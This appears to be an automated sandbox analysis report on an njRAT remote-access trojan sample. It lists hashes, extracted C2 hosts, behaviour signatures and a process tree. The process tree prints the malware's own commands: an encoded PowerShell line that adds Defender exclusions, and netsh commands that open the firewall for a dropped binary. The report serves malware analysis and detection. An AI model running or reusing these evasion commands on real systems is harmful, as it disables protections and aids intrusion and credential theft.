Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-07-2023 19:02

General

  • Target

    shadowscripts.exe

  • Size

    1.2MB

  • MD5

    b0a79b29052cc5c816336f4b62284d9a

  • SHA1

    fbc8b1d5abe62d281e80f469bfbc08f106ad0979

  • SHA256

    12e490b358c0fa22c31181112cbef58b4636f287d586b5ffa412facd5fee3693

  • SHA512

    a9aed2651024fa97164db592d835e4276e5465007c44a3cbafd305556f1b36fa966bcdf6e87cdd3d4373f9beaf32164a4dabd657a5523735511b23a55e65563a

  • SSDEEP

    24576:8D7XBCahuVE5ocC6SC8fsXhugahBsCjz3XH8gohXdHI+1o7R:qlCa4emD6SVfmevjDH8dtHzqR

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

stupids

C2

hakim32.ddns.net:2000

hands-social.at.ply.gg:46242

Mutex

d4529f156f8f79f81b02518c9cf09857

Attributes
  • reg_key

    d4529f156f8f79f81b02518c9cf09857

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 1 TTPs 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe
    "C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4636
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYwBrACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1880
    • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
      "C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
      2⤵
      • Executes dropped EXE
      PID:2460
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe
        "C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:1748
    • C:\Users\Admin\AppData\Local\Temp\Server2223.exe
      "C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Users\Admin\AppData\Local\Temp\server.exe
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Drops autorun.inf file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          PID:3252
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
          4⤵
          • Modifies Windows Firewall
          PID:3400
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          PID:3164
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svhost.exe.log

      Filesize

      765B

      MD5

      78c3b7e51d2f3e17041516a5f9a5e58d

      SHA1

      673979f1d2765fdd377244847e38e15e2bd77a63

      SHA256

      b005bbd1b6293c6b6ae5ee122f0ccf6ff455168f539643412d07df64266f9f01

      SHA512

      dbc1ec473bf034f6ec94c0fc9d8b84eb1562869249f8064dd8e8bc19626d5706b22e091f3264a04e307b59dfc76af73ec33053edc8ac6475e4c5c5dd3b331ebd

    • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe

      Filesize

      913KB

      MD5

      799c188cf6df366f4c0f98b8800a4977

      SHA1

      161d6006518879ecba6cf45b29599992d8eadfce

      SHA256

      32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841

      SHA512

      32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

    • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe

      Filesize

      913KB

      MD5

      799c188cf6df366f4c0f98b8800a4977

      SHA1

      161d6006518879ecba6cf45b29599992d8eadfce

      SHA256

      32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841

      SHA512

      32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

    • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe

      Filesize

      913KB

      MD5

      799c188cf6df366f4c0f98b8800a4977

      SHA1

      161d6006518879ecba6cf45b29599992d8eadfce

      SHA256

      32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841

      SHA512

      32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

    • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

      Filesize

      93KB

      MD5

      cb7303205cfb306b5f41820e248a9a5a

      SHA1

      46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

      SHA256

      6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

      SHA512

      87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

    • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

      Filesize

      93KB

      MD5

      cb7303205cfb306b5f41820e248a9a5a

      SHA1

      46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

      SHA256

      6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

      SHA512

      87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

    • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

      Filesize

      93KB

      MD5

      cb7303205cfb306b5f41820e248a9a5a

      SHA1

      46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

      SHA256

      6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

      SHA512

      87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhihzd34.3ng.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\melt.txt

      Filesize

      44B

      MD5

      0371617c0582de75186bbd471f349171

      SHA1

      3573ac51c9f32cd1979def85242d3a90bdc9c871

      SHA256

      9979119a3599ecc2dd4149131be8345469e09cba46726f203795d9563d3c0d4a

      SHA512

      f83f66c907bb2a3f0fb3b3a535423e8aed122f1ba4c1a9aa65c84b9649a50ef6871b1b236913e16e3980372663fba969f514c19bd4b83a9a6d9e33bbcb520115

    • C:\Users\Admin\AppData\Local\Temp\server.exe

      Filesize

      93KB

      MD5

      cb7303205cfb306b5f41820e248a9a5a

      SHA1

      46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

      SHA256

      6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

      SHA512

      87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

    • C:\Users\Admin\AppData\Local\Temp\server.exe

      Filesize

      93KB

      MD5

      cb7303205cfb306b5f41820e248a9a5a

      SHA1

      46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

      SHA256

      6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

      SHA512

      87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe

      Filesize

      183KB

      MD5

      9e74e4f56a6568d89660627d2ea95ec0

      SHA1

      41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

      SHA256

      7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

      SHA512

      f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe

      Filesize

      183KB

      MD5

      9e74e4f56a6568d89660627d2ea95ec0

      SHA1

      41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

      SHA256

      7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

      SHA512

      f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe

      Filesize

      183KB

      MD5

      9e74e4f56a6568d89660627d2ea95ec0

      SHA1

      41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

      SHA256

      7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

      SHA512

      f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

    • C:\Users\Admin\AppData\Roaming\Microsoft\svhost.exe

      Filesize

      183KB

      MD5

      9e74e4f56a6568d89660627d2ea95ec0

      SHA1

      41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

      SHA256

      7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

      SHA512

      f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

    • C:\Users\Admin\AppData\Roaming\app

      Filesize

      5B

      MD5

      d43c5b07c128b116b7bc8faf7b8efa9d

      SHA1

      dd3540ad4ae14b21b665d108cf4570c2dfa6a6fa

      SHA256

      80ad1cc7b3a784dad618a445af0c8cf3efa903f82a814756f2aaa7b57f45791f

      SHA512

      618b01e2b808e1954d011635dfdf63bc75855145208fc5cae33ce09c7e5b43cf978f6511beb311765e6920e728a290c9f9ced7563e40e8ff8d093d50fdc18334

    • C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe

      Filesize

      183KB

      MD5

      9e74e4f56a6568d89660627d2ea95ec0

      SHA1

      41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

      SHA256

      7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

      SHA512

      f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

    • memory/1748-273-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1748-266-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/1748-267-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1748-242-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1748-223-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/1748-224-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1748-225-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/1748-272-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1748-274-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

      Filesize

      64KB

    • memory/1880-164-0x0000000002C60000-0x0000000002C96000-memory.dmp

      Filesize

      216KB

    • memory/1880-179-0x0000000005B70000-0x0000000005BD6000-memory.dmp

      Filesize

      408KB

    • memory/1880-178-0x0000000005270000-0x0000000005292000-memory.dmp

      Filesize

      136KB

    • memory/1880-186-0x0000000005C50000-0x0000000005CB6000-memory.dmp

      Filesize

      408KB

    • memory/1880-257-0x00000000075F0000-0x00000000075FA000-memory.dmp

      Filesize

      40KB

    • memory/1880-261-0x0000000007810000-0x00000000078A6000-memory.dmp

      Filesize

      600KB

    • memory/1880-245-0x0000000007580000-0x000000000759A000-memory.dmp

      Filesize

      104KB

    • memory/1880-244-0x0000000007BC0000-0x000000000823A000-memory.dmp

      Filesize

      6.5MB

    • memory/1880-173-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-263-0x00000000077C0000-0x00000000077CE000-memory.dmp

      Filesize

      56KB

    • memory/1880-172-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-264-0x00000000078B0000-0x00000000078CA000-memory.dmp

      Filesize

      104KB

    • memory/1880-206-0x0000000004FB0000-0x0000000004FCE000-memory.dmp

      Filesize

      120KB

    • memory/1880-241-0x0000000007420000-0x000000000743E000-memory.dmp

      Filesize

      120KB

    • memory/1880-265-0x0000000007800000-0x0000000007808000-memory.dmp

      Filesize

      32KB

    • memory/1880-231-0x0000000075190000-0x00000000751DC000-memory.dmp

      Filesize

      304KB

    • memory/1880-169-0x00000000053D0000-0x00000000059F8000-memory.dmp

      Filesize

      6.2MB

    • memory/1880-268-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-165-0x0000000074890000-0x0000000075040000-memory.dmp

      Filesize

      7.7MB

    • memory/1880-271-0x0000000074890000-0x0000000075040000-memory.dmp

      Filesize

      7.7MB

    • memory/1880-230-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-226-0x0000000074890000-0x0000000075040000-memory.dmp

      Filesize

      7.7MB

    • memory/1880-227-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-228-0x0000000002CF0000-0x0000000002D00000-memory.dmp

      Filesize

      64KB

    • memory/1880-229-0x00000000073E0000-0x0000000007412000-memory.dmp

      Filesize

      200KB

    • memory/2464-202-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2464-262-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2464-201-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2464-199-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

      Filesize

      64KB

    • memory/2464-246-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2736-160-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2736-161-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2736-200-0x0000000073CE0000-0x0000000074291000-memory.dmp

      Filesize

      5.7MB

    • memory/2736-170-0x00000000017A0000-0x00000000017B0000-memory.dmp

      Filesize

      64KB

    • memory/2748-174-0x000000001C720000-0x000000001C7BC000-memory.dmp

      Filesize

      624KB

    • memory/2748-176-0x000000001BC00000-0x000000001BC08000-memory.dmp

      Filesize

      32KB

    • memory/2748-222-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/2748-171-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/2748-167-0x000000001C100000-0x000000001C5CE000-memory.dmp

      Filesize

      4.8MB

    • memory/2748-177-0x000000001C880000-0x000000001C8CC000-memory.dmp

      Filesize

      304KB

    • memory/2748-168-0x00007FFA4CF60000-0x00007FFA4D901000-memory.dmp

      Filesize

      9.6MB

    • memory/2748-166-0x0000000001780000-0x0000000001790000-memory.dmp

      Filesize

      64KB

    • memory/2748-163-0x000000001BB50000-0x000000001BBF6000-memory.dmp

      Filesize

      664KB

    • memory/2748-162-0x0000000000C70000-0x0000000000CA4000-memory.dmp

      Filesize

      208KB

    • memory/2748-205-0x000000001D300000-0x000000001D60E000-memory.dmp

      Filesize

      3.1MB

    • memory/2748-207-0x0000000001780000-0x0000000001790000-memory.dmp

      Filesize

      64KB